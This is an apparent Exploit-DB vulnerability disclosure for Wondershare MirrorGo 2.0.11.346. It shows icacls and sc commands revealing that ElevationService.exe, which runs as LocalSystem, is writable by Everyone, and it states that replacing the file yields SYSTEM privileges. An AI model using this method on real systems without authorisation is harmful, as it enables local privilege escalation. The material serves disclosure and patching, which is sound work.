Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions

vendor:

MirrorGo

by:

Luis Martinez

7.2

CVSS

HIGH

Local Privilege Escalation

264

CWE

Product Name: MirrorGo

Affected Version From: 2.0.11.346

Affected Version To: 2.0.11.346

Patch Exists: NO

Related CWE:

CPE: a:wondershare:mirrorgo:2.0.11.346

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 Pro x64 es

2022

Wondershare MirrorGo 2.0.11.346 – Insecure File Permissions

A vulnerability was found in Wondershare MirrorGo 2.0.11.346. The Wodershare MirrorGo application has insecure file permissions that allow any user to modify the ElevationService.exe file. This can be exploited by a local attacker to gain elevated privileges on the system.

Mitigation:

Ensure that all files and folders have the correct permissions set to prevent unauthorized access.

Source

Exploit-DB raw data:

# Exploit Title: Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-23
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/mirror_go_full8050.exe
# Tested Version: 2.0.11.346
# Vulnerability Type: Local Privilege Escalation
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Privilege Escalation: 

# Insecure folders permissions issue:

C:\>icacls "C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\*" | findstr /i "everyone" | findstr /i ".exe"


C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\adb.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\BsSndRpt.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall32.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall64.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\MirrorGo.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe.config Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\unins000.exe Everyone:(I)(F)

# Service info:

C:\>sc qc ElevationService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ElevationService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wondershare Driver Install Service help
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A vulnerability was found in Wondershare MirrorGo 2.0.11.346. The Wondershare MirrorGo executable
"ElevationService.exe" has incorrect permissions, allowing a local unprivileged user to replace it
with a malicious file that will be executed with "LocalSystem" privileges.